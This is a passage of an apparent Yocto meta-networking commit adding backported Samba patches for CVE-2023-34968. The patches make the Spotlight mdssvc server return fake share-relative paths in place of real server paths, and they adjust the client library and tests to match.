a/source3/rpc_server/mdssvc/mdssvc.h ++++ b/source3/rpc_server/mdssvc/mdssvc.h +@@ -157,9 +157,10 @@ struct mds_ctx *mds_init_ctx(TALLOC_CTX *mem_ctx, + int snum, + const char *sharename, + const char *path); +-extern bool mds_dispatch(struct mds_ctx *query_ctx, ++extern bool mds_dispatch(struct mds_ctx *mds_ctx, + struct mdssvc_blob *request_blob, +- struct mdssvc_blob *response_blob); ++ struct mdssvc_blob *response_blob, ++ size_t max_fragment_size); + bool mds_add_result(struct sl_query *slq, const char *path); + + #endif /* _MDSSVC_H */ +diff --git a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c +index 714e6c1..59e2a97 100644 +--- a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c ++++ b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c +@@ -269,7 +269,10 @@ void _mdssvc_cmd(struct pipes_struct *p, struct mdssvc_cmd *r) + /* We currently don't use fragmentation at the mdssvc RPC layer */ + *r->out.fragment = 0; + +- ok = mds_dispatch(mds_ctx, &r->in.request_blob, r->out.response_blob); ++ ok = mds_dispatch(mds_ctx, ++ &r->in.request_blob, ++ r->out.response_blob, ++ r->in.max_fragment_size1); + if (ok) { + *r->out.unkn9 = 0; + } else { +diff --git a/source3/rpcclient/cmd_spotlight.c b/source3/rpcclient/cmd_spotlight.c +index 64fe321..ba3f61f 100644 +--- a/source3/rpcclient/cmd_spotlight.c ++++ b/source3/rpcclient/cmd_spotlight.c +@@ -43,7 +43,6 @@ static NTSTATUS cmd_mdssvc_fetch_properties( + uint32_t unkn3; /* server always returns 0 ? */ + struct mdssvc_blob request_blob; + struct mdssvc_blob response_blob; +- ssize_t len; + uint32_t max_fragment_size = 64 * 1024; + DALLOC_CTX *d, *mds_reply; + uint64_t *uint64var; +@@ -137,20 +136,10 @@ static NTSTATUS cmd_mdssvc_fetch_properties( + goto done; + } + +- request_blob.spotlight_blob = talloc_array(mem_ctx, uint8_t, max_fragment_size); +- if (request_blob.spotlight_blob == NULL) { +- status = NT_STATUS_INTERNAL_ERROR; +- goto done; +- } +- request_blob.size = max_fragment_size; +- +- len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); +- if (len == -1) { +- status = NT_STATUS_INTERNAL_ERROR; ++ status = sl_pack_alloc(mem_ctx, d, &request_blob, max_fragment_size); ++ if (!NT_STATUS_IS_OK(status)) { + goto done; + } +- request_blob.length = len; +- request_blob.size = len; + + status = dcerpc_mdssvc_cmd(b, mem_ctx, + &share_handle, +@@ -204,7 +193,6 @@ static NTSTATUS cmd_mdssvc_fetch_attributes( + uint32_t unkn3; /* server always returns 0 ? */ + struct mdssvc_blob request_blob; + struct mdssvc_blob response_blob; +- ssize_t len; + uint32_t max_fragment_size = 64 * 1024; + DALLOC_CTX *d, *mds_reply; + uint64_t *uint64var; +@@ -352,22 +340,10 @@ static NTSTATUS cmd_mdssvc_fetch_attributes( + goto done; + } + +- request_blob.spotlight_blob = talloc_array(mem_ctx, +- uint8_t, +- max_fragment_size); +- if (request_blob.spotlight_blob == NULL) { +- status = NT_STATUS_INTERNAL_ERROR; +- goto done; +- } +- request_blob.size = max_fragment_size; +- +- len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); +- if (len == -1) { +- status = NT_STATUS_INTERNAL_ERROR; ++ status = sl_pack_alloc(mem_ctx, d, &request_blob, max_fragment_size); ++ if (!NT_STATUS_IS_OK(status)) { + goto done; + } +- request_blob.length = len; +- request_blob.size = len; + + status = dcerpc_mdssvc_cmd(b, mem_ctx, + &share_handle, +diff --git a/source4/torture/rpc/mdssvc.c b/source4/torture/rpc/mdssvc.c +index e99c82c..1305456 100644 +--- a/source4/torture/rpc/mdssvc.c ++++ b/source4/torture/rpc/mdssvc.c +@@ -745,11 +745,9 @@ static bool test_sl_dict_type_safety(struct torture_context *tctx, + ok, done, "dalloc_new failed\n"); + request_blob.size = 64 * 1024; + +- request_blob.length = sl_pack(d, +- (char *)request_blob.spotlight_blob, +- request_blob.size); +- torture_assert_goto(tctx, request_blob.length > 0, +- ok, done, "sl_pack failed\n"); ++ status = sl_pack_alloc(tctx, d, &request_blob, 64 * 1024); ++ torture_assert_ntstatus_ok_goto(tctx, status, ok, done, ++ "sl_pack_alloc() failed\n"); + + status = dcerpc_mdssvc_cmd(b, + state, +@@ -836,7 +834,6 @@ static bool test_mdssvc_fetch_attr_unknown_cnid(struct torture_context *tctx, + const char *path_type = NULL; + uint64_t ino64; + NTSTATUS status; +- ssize_t len; + int ret; + bool ok = true; + +@@ -901,19 +898,10 @@ static bool test_mdssvc_fetch_attr_unknown_cnid(struct torture_context *tctx, + ret = dalloc_add(array, cnids, sl_cnids_t); + torture_assert_goto(tctx, ret == 0, ret, done, "dalloc_add failed\n"); + +- request_blob.spotlight_blob = talloc_array(state, +- uint8_t, +- max_fragment_size); +- torture_assert_not_null_goto(tctx, request_blob.spotlight_blob, +- ret, done, "dalloc_zero failed\n"); +- request_blob.size = max_fragment_size; +- +- len = sl_pack(d, (char *)request_blob.spotlight_blob, request_blob.size); +- torture_assert_goto(tctx, len != -1, ret, done, "sl_pack failed\n"); +- +- request_blob.length = len; +- request_blob.size = len; + ++ status = sl_pack_alloc(tctx, d, &request_blob, max_fragment_size); ++ torture_assert_ntstatus_ok_goto(tctx, status, ok, done, ++ "sl_pack_alloc() failed\n"); + status = dcerpc_mdssvc_cmd(b, + state, + &state->ph, +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0010.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0010.patch new file mode 100644 index 0000000000..57668f5eef --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0010.patch @@ -0,0 +1,484 @@ +From a5c570e262911874e43e82de601d809aa5b1b729 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Sat, 17 Jun 2023 13:53:27 +0200 +Subject: [PATCH] CVE-2023-34968: mdscli: return share relative paths The next + commit will change the Samba Spotlight server to return absolute paths that + start with the sharename as "/SHARENAME/..." followed by the share path + relative appended. +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +So given a share + + [spotlight] + path = /foo/bar + spotlight = yes + +and a file inside this share with a full path of + + /foo/bar/dir/file + +previously a search that matched this file would returns the absolute +server-side pato of the file, ie + + /foo/bar/dir/file + +This will be change to + + /spotlight/dir/file + +As currently the mdscli library and hence the mdsearch tool print out these +paths returned from the server, we have to change the output to accomodate these +fake paths. The only way to do this sensibly is by makeing the paths relative to +the containing share, so just + + dir/file + +in the example above. + +The client learns about the share root path prefix – real server-side of fake in +the future – in an initial handshake in the "share_path" out argument of the +mdssvc_open() RPC call, so the client can use this path to convert the absolute +path to relative. + +There is however an additional twist: the macOS Spotlight server prefixes this +absolute path with another prefix, typically "/System/Volumes/Data", so in the +example above the full path for the same search would be + + /System/Volumes/Data/foo/bar/dir/file + +So macOS does return the full server-side path too, just prefixed with an +additional path. This path prefixed can be queried by the client in the +mdssvc_cmd() RPC call with an Spotlight command of "fetchPropertiesForContext:" +and the path is returned in a dictionary with key "kMDSStorePathScopes". Samba +just returns "/" for this. + +Currently the mdscli library doesn't issue this Spotlight RPC +request (fetchPropertiesForContext), so this is added in this commit. In the +end, all search result paths are stripped of the combined prefix + + kMDSStorePathScopes + share_path (from mdssvc_open). + +eg + + kMDSStorePathScopes = /System/Volumes/Data + share_path = /foo/bar + search result = /System/Volumes/Data/foo/bar/dir/file + relative path returned by mdscli = dir/file + +Makes sense? :) + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/a5c570e262911874e43e82de601d809aa5b1b729] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/tests/dcerpc/mdssvc.py | 26 ++-- + source3/rpc_client/cli_mdssvc.c | 155 +++++++++++++++++++++++- + source3/rpc_client/cli_mdssvc_private.h | 4 + + source3/rpc_client/cli_mdssvc_util.c | 68 +++++++++++ + source3/rpc_client/cli_mdssvc_util.h | 4 + + 5 files changed, 243 insertions(+), 14 deletions(-) + +diff --git a/python/samba/tests/dcerpc/mdssvc.py b/python/samba/tests/dcerpc/mdssvc.py +index b0df509..5002e5d 100644 +--- a/python/samba/tests/dcerpc/mdssvc.py ++++ b/python/samba/tests/dcerpc/mdssvc.py +@@ -84,10 +84,11 @@ class MdssvcTests(RpcInterfaceTestCase): + self.t = threading.Thread(target=MdssvcTests.http_server, args=(self,)) + self.t.setDaemon(True) + self.t.start() ++ self.sharepath = os.environ["LOCAL_PATH"] + time.sleep(1) + + conn = mdscli.conn(self.pipe, 'spotlight', '/foo') +- self.sharepath = conn.sharepath() ++ self.fakepath = conn.sharepath() + conn.disconnect(self.pipe) + + for file in testfiles: +@@ -105,12 +106,11 @@ class MdssvcTests(RpcInterfaceTestCase): + self.server.serve_forever() + + def run_test(self, query, expect, json_in, json_out): +- expect = [s.replace("%BASEPATH%", self.sharepath) for s in expect] + self.server.json_in = json_in.replace("%BASEPATH%", self.sharepath) + self.server.json_out = json_out.replace("%BASEPATH%", self.sharepath) + + self.conn = mdscli.conn(self.pipe, 'spotlight', '/foo') +- search = self.conn.search(self.pipe, query, self.sharepath) ++ search = self.conn.search(self.pipe, query, self.fakepath) + + # Give it some time, the get_results() below returns immediately + # what's available, so if we ask to soon, we might get back no results +@@ -141,7 +141,7 @@ class MdssvcTests(RpcInterfaceTestCase): + ] + } + }''' +- exp_results = ["%BASEPATH%/foo", "%BASEPATH%/bar"] ++ exp_results = ["foo", "bar"] + self.run_test('*=="samba*"', exp_results, exp_json_query, fake_json_response) + + def test_mdscli_search_escapes(self): +@@ -181,14 +181,14 @@ class MdssvcTests(RpcInterfaceTestCase): + } + }''' + exp_results = [ +- r"%BASEPATH%/x+x", +- r"%BASEPATH%/x*x", +- r"%BASEPATH%/x=x", +- r"%BASEPATH%/x'x", +- r"%BASEPATH%/x?x", +- r"%BASEPATH%/x x", +- r"%BASEPATH%/x(x", +- "%BASEPATH%/x\"x", +- r"%BASEPATH%/x\x", ++ r"x+x", ++ r"x*x", ++ r"x=x", ++ r"x'x", ++ r"x?x", ++ r"x x", ++ r"x(x", ++ "x\"x", ++ r"x\x", + ] + self.run_test(sl_query, exp_results, exp_json_query, fake_json_response) +diff --git a/source3/rpc_client/cli_mdssvc.c b/source3/rpc_client/cli_mdssvc.c +index 07c19b5..a047b91 100644 +--- a/source3/rpc_client/cli_mdssvc.c ++++ b/source3/rpc_client/cli_mdssvc.c +@@ -43,10 +43,12 @@ char *mdscli_get_basepath(TALLOC_CTX *mem_ctx, + struct mdscli_connect_state { + struct tevent_context *ev; + struct mdscli_ctx *mdscli_ctx; ++ struct mdssvc_blob response_blob; + }; + + static void mdscli_connect_open_done(struct tevent_req *subreq); + static void mdscli_connect_unknown1_done(struct tevent_req *subreq); ++static void mdscli_connect_fetch_props_done(struct tevent_req *subreq); + + struct tevent_req *mdscli_connect_send(TALLOC_CTX *mem_ctx, + struct tevent_context *ev, +@@ -111,6 +113,7 @@ static void mdscli_connect_open_done(struct tevent_req *subreq) + struct mdscli_connect_state *state = tevent_req_data( + req, struct mdscli_connect_state); + struct mdscli_ctx *mdscli_ctx = state->mdscli_ctx; ++ size_t share_path_len; + NTSTATUS status; + + status = dcerpc_mdssvc_open_recv(subreq, state); +@@ -120,6 +123,18 @@ static void mdscli_connect_open_done(struct tevent_req *subreq) + return; + } + ++ share_path_len = strlen(mdscli_ctx->mdscmd_open.share_path); ++ if (share_path_len < 1 || share_path_len > UINT16_MAX) { ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ mdscli_ctx->mdscmd_open.share_path_len = share_path_len; ++ ++ if (mdscli_ctx->mdscmd_open.share_path[share_path_len-1] == '/') { ++ mdscli_ctx->mdscmd_open.share_path[share_path_len-1] = '\0'; ++ mdscli_ctx->mdscmd_open.share_path_len--; ++ } ++ + subreq = dcerpc_mdssvc_unknown1_send( + state, + state->ev, +@@ -146,6 +161,8 @@ static void mdscli_connect_unknown1_done(struct tevent_req *subreq) + subreq, struct tevent_req); + struct mdscli_connect_state *state = tevent_req_data( + req, struct mdscli_connect_state); ++ struct mdscli_ctx *mdscli_ctx = state->mdscli_ctx; ++ struct mdssvc_blob request_blob; + NTSTATUS status; + + status = dcerpc_mdssvc_unknown1_recv(subreq, state); +@@ -153,6 +170,108 @@ static void mdscli_connect_unknown1_done(struct tevent_req *subreq) + if (tevent_req_nterror(req, status)) { + return; + } ++ status = mdscli_blob_fetch_props(state, ++ state->mdscli_ctx, ++ &request_blob); ++ if (tevent_req_nterror(req, status)) { ++ return; ++ } ++ ++ subreq = dcerpc_mdssvc_cmd_send(state, ++ state->ev, ++ mdscli_ctx->bh, ++ &mdscli_ctx->ph, ++ 0, ++ mdscli_ctx->dev, ++ mdscli_ctx->mdscmd_open.unkn2, ++ 0, ++ mdscli_ctx->flags, ++ request_blob, ++ 0, ++ mdscli_ctx->max_fragment_size, ++ 1, ++ mdscli_ctx->max_fragment_size, ++ 0, ++ 0, ++ &mdscli_ctx->mdscmd_cmd.fragment, ++ &state->response_blob, ++ &mdscli_ctx->mdscmd_cmd.unkn9); ++ if (tevent_req_nomem(subreq, req)) { ++ return; ++ } ++ tevent_req_set_callback(subreq, mdscli_connect_fetch_props_done, req); ++ mdscli_ctx->async_pending++; ++ return; ++} ++ ++static void mdscli_connect_fetch_props_done(struct tevent_req *subreq) ++{ ++ struct tevent_req *req = tevent_req_callback_data( ++ subreq, struct tevent_req); ++ struct mdscli_connect_state *state = tevent_req_data( ++ req, struct mdscli_connect_state); ++ struct mdscli_ctx *mdscli_ctx = state->mdscli_ctx; ++ DALLOC_CTX *d = NULL; ++ sl_array_t *path_scope_array = NULL; ++ char *path_scope = NULL; ++ NTSTATUS status; ++ bool ok; ++ ++ status = dcerpc_mdssvc_cmd_recv(subreq, state); ++ TALLOC_FREE(subreq); ++ state->mdscli_ctx->async_pending--; ++ if (tevent_req_nterror(req, status)) { ++ return; ++ } ++ ++ d = dalloc_new(state); ++ if (tevent_req_nomem(d, req)) { ++ return; ++ } ++ ++ ok = sl_unpack(d, ++ (char *)state->response_blob.spotlight_blob, ++ state->response_blob.length); ++ if (!ok) { ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ ++ path_scope_array = dalloc_value_for_key(d, ++ "DALLOC_CTX", 0, ++ "kMDSStorePathScopes", ++ "sl_array_t"); ++ if (path_scope_array == NULL) { ++ DBG_ERR("Missing kMDSStorePathScopes\n"); ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ ++ path_scope = dalloc_get(path_scope_array, "char *", 0); ++ if (path_scope == NULL) { ++ DBG_ERR("Missing path in kMDSStorePathScopes\n"); ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ ++ mdscli_ctx->path_scope_len = strlen(path_scope); ++ if (mdscli_ctx->path_scope_len < 1 || ++ mdscli_ctx->path_scope_len > UINT16_MAX) ++ { ++ DBG_ERR("Bad path_scope: %s\n", path_scope); ++ tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); ++ return; ++ } ++ mdscli_ctx->path_scope = talloc_strdup(mdscli_ctx, path_scope); ++ if (tevent_req_nomem(mdscli_ctx->path_scope, req)) { ++ return; ++ } ++ ++ if (mdscli_ctx->path_scope[mdscli_ctx->path_scope_len-1] == '/') { ++ mdscli_ctx->path_scope[mdscli_ctx->path_scope_len-1] = '\0'; ++ mdscli_ctx->path_scope_len--; ++ } ++ + + tevent_req_done(req); + } +@@ -697,7 +816,10 @@ static void mdscli_get_path_done(struct tevent_req *subreq) + struct mdscli_get_path_state *state = tevent_req_data( + req, struct mdscli_get_path_state); + DALLOC_CTX *d = NULL; ++ size_t pathlen; ++ size_t prefixlen; + char *path = NULL; ++ const char *p = NULL; + NTSTATUS status; + bool ok; + +@@ -732,7 +854,38 @@ static void mdscli_get_path_done(struct tevent_req *subreq) + tevent_req_nterror(req, NT_STATUS_INTERNAL_ERROR); + return; + } +- state->path = talloc_move(state, &path); ++ ++ /* Path is prefixed by /PATHSCOPE/SHARENAME/, strip it */ ++ pathlen = strlen(path); ++ ++ /* ++ * path_scope_len and share_path_len are already checked to be smaller ++ * then UINT16_MAX so this can't overflow ++ */ ++ prefixlen = state->mdscli_ctx->path_scope_len ++ + state->mdscli_ctx->mdscmd_open.share_path_len; ++ ++ if (pathlen < prefixlen) { ++ DBG_DEBUG("Bad path: %s\n", path); ++ tevent_req_nterror(req, NT_STATUS_INVALID_PARAMETER); ++ return; ++ } ++ ++ p = path + prefixlen; ++ while (*p == '/') { ++ p++; ++ } ++ if (*p == '\0') { ++ DBG_DEBUG("Bad path: %s\n", path); ++ tevent_req_nterror(req, NT_STATUS_INVALID_PARAMETER); ++ return; ++ } ++ ++ state->path = talloc_strdup(state, p); ++ if (state->path == NULL) { ++ tevent_req_nterror(req, NT_STATUS_NO_MEMORY); ++ return; ++ } + DBG_DEBUG("path: %s\n", state->path); + + tevent_req_done(req); +diff --git a/source3/rpc_client/cli_mdssvc_private.h b/source3/rpc_client/cli_mdssvc_private.h +index 031af85..b10aca0 100644 +--- a/source3/rpc_client/cli_mdssvc_private.h ++++ b/source3/rpc_client/cli_mdssvc_private.h +@@ -42,6 +42,7 @@ struct mdscli_ctx { + /* cmd specific or unknown fields */ + struct { + char share_path[1025]; ++ size_t share_path_len; + uint32_t unkn2; + uint32_t unkn3; + } mdscmd_open; +@@ -56,6 +57,9 @@ struct mdscli_ctx { + struct { + uint32_t status; + } mdscmd_close; ++ ++ char *path_scope; ++ size_t path_scope_len; + }; + + struct mdscli_search_ctx { +diff --git a/source3/rpc_client/cli_mdssvc_util.c b/source3/rpc_client/cli_mdssvc_util.c +index a39202d..1eaaca7 100644 +--- a/source3/rpc_client/cli_mdssvc_util.c ++++ b/source3/rpc_client/cli_mdssvc_util.c +@@ -28,6 +28,74 @@ + #include "rpc_server/mdssvc/dalloc.h" + #include "rpc_server/mdssvc/marshalling.h" + ++NTSTATUS mdscli_blob_fetch_props(TALLOC_CTX *mem_ctx, ++ struct mdscli_ctx *ctx, ++ struct mdssvc_blob *blob) ++{ ++ DALLOC_CTX *d = NULL; ++ uint64_t *uint64p = NULL; ++ sl_array_t *array = NULL; ++ sl_array_t *cmd_array = NULL; ++ NTSTATUS status; ++ int ret; ++ ++ d = dalloc_new(mem_ctx); ++ if (d == NULL) { ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ array = dalloc_zero(d, sl_array_t); ++ if (array == NULL) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ ret = dalloc_add(d, array, sl_array_t); ++ if (ret != 0) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ cmd_array = dalloc_zero(d, sl_array_t); ++ if (cmd_array == NULL) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ ret = dalloc_add(array, cmd_array, sl_array_t); ++ if (ret != 0) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ ret = dalloc_stradd(cmd_array, "fetchPropertiesForContext:"); ++ if (ret != 0) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ uint64p = talloc_zero_array(cmd_array, uint64_t, 2); ++ if (uint64p == NULL) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ talloc_set_name(uint64p, "uint64_t *"); ++ ++ ret = dalloc_add(cmd_array, uint64p, uint64_t *); ++ if (ret != 0) { ++ TALLOC_FREE(d); ++ return NT_STATUS_NO_MEMORY; ++ } ++ ++ status = sl_pack_alloc(mem_ctx, d, blob, ctx->max_fragment_size); ++ TALLOC_FREE(d); ++ if (!NT_STATUS_IS_OK(status)) { ++ return status; ++ } ++ return NT_STATUS_OK; ++} ++ + NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + struct mdscli_search_ctx *search, + struct mdssvc_blob *blob) +diff --git a/source3/rpc_client/cli_mdssvc_util.h b/source3/rpc_client/cli_mdssvc_util.h +index 7a98c85..3f32475 100644 +--- a/source3/rpc_client/cli_mdssvc_util.h ++++ b/source3/rpc_client/cli_mdssvc_util.h +@@ -21,6 +21,10 @@ + #ifndef _MDSCLI_UTIL_H_ + #define _MDSCLI_UTIL_H_ + ++NTSTATUS mdscli_blob_fetch_props(TALLOC_CTX *mem_ctx, ++ struct mdscli_ctx *ctx, ++ struct mdssvc_blob *blob); ++ + NTSTATUS mdscli_blob_search(TALLOC_CTX *mem_ctx, + struct mdscli_search_ctx *search, + struct mdssvc_blob *blob); +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0011.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0011.patch new file mode 100644 index 0000000000..d2bef187f7 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34968_0011.patch @@ -0,0 +1,295 @@ +From 091b0265fe42878d676def5d4f5b4f8f3977b0e2 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Mon, 5 Jun 2023 18:02:20 +0200 +Subject: [PATCH] CVE-2023-34968: mdssvc: return a fake share path Instead of + returning the real server-side absolute path of shares and search results, + return a fake absolute path replacing the path of the share with the share + name, iow for a share "test" with a server-side path of "/foo/bar", we + previously returned + + /foo/bar and + /foo/bar/search/result + +and now return + + /test and + /test/search/result + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15388 + +Signed-off-by: Ralph Boehme <slow@samba.org> +Reviewed-by: Stefan Metzmacher <metze@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/091b0265fe42878d676def5d4f5b4f8f3977b0e2] + +CVE: CVE-2023-34968 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/lib/util_path.c | 52 ++++++++++++++++++++ + source3/lib/util_path.h | 5 ++ + source3/rpc_server/mdssvc/mdssvc.c | 60 +++++++++++++++++++++-- + source3/rpc_server/mdssvc/mdssvc.h | 1 + + source3/rpc_server/mdssvc/srv_mdssvc_nt.c | 17 +++++-- + 6 files changed, 128 insertions(+), 7 deletions(-) + mode change 100755 => 100644 source3/libads/ldap.c + +diff --git a/source3/lib/util_path.c b/source3/lib/util_path.c +index c34b734..5b5a51c 100644 +--- a/source3/lib/util_path.c ++++ b/source3/lib/util_path.c +@@ -21,8 +21,10 @@ + * along with this program. If not, see <http://www.gnu.org/licenses/>. + */ + ++#include "includes.h" + #include "replace.h" + #include <talloc.h> ++#include "lib/util/debug.h" + #include "lib/util/samba_util.h" + #include "lib/util_path.h" + +@@ -210,3 +212,53 @@ char *canonicalize_absolute_path(TALLOC_CTX *ctx, const char *pathname_in) + *p++ = '\0'; + return pathname; + } ++ ++/* ++ * Take two absolute paths, figure out if "subdir" is a proper ++ * subdirectory of "parent". Return the component relative to the ++ * "parent" without the potential "/". Take care of "parent" ++ * possibly ending in "/". ++ */ ++bool subdir_of(const char *parent, ++ size_t parent_len, ++ const char *subdir, ++ const char **_relative) ++{ ++ const char *relative = NULL; ++ bool matched; ++ ++ SMB_ASSERT(parent[0] == '/'); ++ SMB_ASSERT(subdir[0] == '/'); ++ ++ if (parent_len == 1) { ++ /* ++ * Everything is below "/" ++ */ ++ *_relative = subdir+1; ++ return true; ++ } ++ ++ if (parent[parent_len-1] == '/') { ++ parent_len -= 1; ++ } ++ ++ matched = (strncmp(subdir, parent, parent_len) == 0); ++ if (!matched) { ++ return false; ++ } ++ ++ relative = &subdir[parent_len]; ++ ++ if (relative[0] == '\0') { ++ *_relative = relative; /* nothing left */ ++ return true; ++ } ++ ++ if (relative[0] == '/') { ++ /* End of parent must match a '/' in subdir. */ ++ *_relative = relative+1; ++ return true; ++ } ++ ++ return false; ++} +diff --git a/source3/lib/util_path.h b/source3/lib/util_path.h +index 3e7d04d..6d2155a 100644 +--- a/source3/lib/util_path.h ++++ b/source3/lib/util_path.h +@@ -31,5 +31,10 @@ char *lock_path(TALLOC_CTX *mem_ctx, const char *name); + char *state_path(TALLOC_CTX *mem_ctx, const char *name); + char *cache_path(TALLOC_CTX *mem_ctx, const char *name); + char *canonicalize_absolute_path(TALLOC_CTX *ctx, const char *abs_path); ++bool subdir_of(const char *parent, ++ size_t parent_len, ++ const char *subdir, ++ const char **_relative); ++ + + #endif +diff --git a/source3/rpc_server/mdssvc/mdssvc.c b/source3/rpc_server/mdssvc/mdssvc.c +index 19257e8..d442d8d 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.c ++++ b/source3/rpc_server/mdssvc/mdssvc.c +@@ -520,11 +520,14 @@ static bool inode_map_add(struct sl_query *slq, + bool mds_add_result(struct sl_query *slq, const char *path) + { + struct smb_filename *smb_fname = NULL; ++ char *fake_path = NULL; ++ const char *relative = NULL; + struct stat_ex sb; + uint32_t attr; + uint64_t ino64; + int result; + NTSTATUS status; ++ bool sub; + bool ok; + + /* +@@ -610,6 +613,17 @@ bool mds_add_result(struct sl_query *slq, const char *path) + } + } + ++ sub = subdir_of(slq->mds_ctx->spath, ++ slq->mds_ctx->spath_len, ++ path, ++ &relative); ++ if (!sub) { ++ DBG_ERR("[%s] is not inside [%s]\n", ++ path, slq->mds_ctx->spath); ++ slq->state = SLQ_STATE_ERROR; ++ return false; ++ } ++ + /* + * Add inode number and filemeta to result set, this is what + * we return as part of the result set of a query +@@ -622,18 +636,30 @@ bool mds_add_result(struct sl_query *slq, const char *path) + slq->state = SLQ_STATE_ERROR; + return false; + } ++ ++ fake_path = talloc_asprintf(slq, ++ "/%s/%s", ++ slq->mds_ctx->sharename, ++ relative); ++ if (fake_path == NULL) { ++ slq->state = SLQ_STATE_ERROR; ++ return false; ++ } ++ + ok = add_filemeta(slq->mds_ctx, + slq->reqinfo, + slq->query_results->fm_array, +- path, ++ fake_path, + &sb); + if (!ok) { + DBG_ERR("add_filemeta error\n"); ++ TALLOC_FREE(fake_path); + slq->state = SLQ_STATE_ERROR; + return false; + } + +- ok = inode_map_add(slq, ino64, path, &sb); ++ ok = inode_map_add(slq, ino64, fake_path, &sb); ++ TALLOC_FREE(fake_path); + if (!ok) { + DEBUG(1, ("inode_map_add error\n")); + slq->state = SLQ_STATE_ERROR; +@@ -840,6 +866,32 @@ static void slq_close_timer(struct tevent_context *ev, + } + } + ++/** ++ * Translate a fake scope from the client like /sharename/dir ++ * to the real server-side path, replacing the "/sharename" part ++ * with the absolute server-side path of the share. ++ **/ ++static bool mdssvc_real_scope(struct sl_query *slq, const char *fake_scope) ++{ ++ size_t sname_len = strlen(slq->mds_ctx->sharename); ++ size_t fake_scope_len = strlen(fake_scope); ++ ++ if (fake_scope_len < sname_len + 1) { ++ DBG_ERR("Short scope [%s] for share [%s]\n", ++ fake_scope, slq->mds_ctx->sharename); ++ return false; ++ } ++ ++ slq->path_scope = talloc_asprintf(slq, ++ "%s%s", ++ slq->mds_ctx->spath, ++ fake_scope + sname_len + 1); ++ if (slq->path_scope == NULL) { ++ return false; ++ } ++ return true; ++} ++ + /** + * Begin a search query + **/ +@@ -946,8 +998,8 @@ static bool slrpc_open_query(struct mds_ctx *mds_ctx, + goto error; + } + +- slq->path_scope = talloc_strdup(slq, scope); +- if (slq->path_scope == NULL) { ++ ok = mdssvc_real_scope(slq, scope); ++ if (!ok) { + goto error; + } + +diff --git a/source3/rpc_server/mdssvc/mdssvc.h b/source3/rpc_server/mdssvc/mdssvc.h +index b3bd8b9..8434812 100644 +--- a/source3/rpc_server/mdssvc/mdssvc.h ++++ b/source3/rpc_server/mdssvc/mdssvc.h +@@ -127,6 +127,7 @@ struct mds_ctx { + int snum; + const char *sharename; + const char *spath; ++ size_t spath_len; + struct connection_struct *conn; + struct sl_query *query_list; /* list of active queries */ + struct db_context *ino_path_map; /* dbwrap rbt for storing inode->path mappings */ +diff --git a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c +index 59e2a97..b20bd2a 100644 +--- a/source3/rpc_server/mdssvc/srv_mdssvc_nt.c ++++ b/source3/rpc_server/mdssvc/srv_mdssvc_nt.c +@@ -121,6 +121,7 @@ void _mdssvc_open(struct pipes_struct *p, struct mdssvc_open *r) + loadparm_s3_global_substitution(); + int snum; + char *outpath = discard_const_p(char, r->out.share_path); ++ char *fake_path = NULL; + char *path; + NTSTATUS status; + +@@ -144,21 +145,31 @@ void _mdssvc_open(struct pipes_struct *p, struct mdssvc_open *r) + return; + } + ++ fake_path = talloc_asprintf(p->mem_ctx, "/%s", r->in.share_name); ++ if (fake_path == NULL) { ++ DBG_ERR("Couldn't create fake share path for %s\n", ++ r->in.share_name); ++ talloc_free(path); ++ p->fault_state = DCERPC_FAULT_CANT_PERFORM; ++ return; ++ } ++ + status = create_mdssvc_policy_handle(p->mem_ctx, p, + snum, + r->in.share_name, + path, + r->out.handle); + if (!NT_STATUS_IS_OK(status)) { +- DBG_ERR("Couldn't create policy handle for %s\n", ++ DBG_ERR("Couldn't create path for %s\n", + r->in.share_name); + talloc_free(path); ++ talloc_free(fake_path); + p->fault_state = DCERPC_FAULT_CANT_PERFORM; + return; + } + +- strlcpy(outpath, path, 1024); +- talloc_free(path); ++ 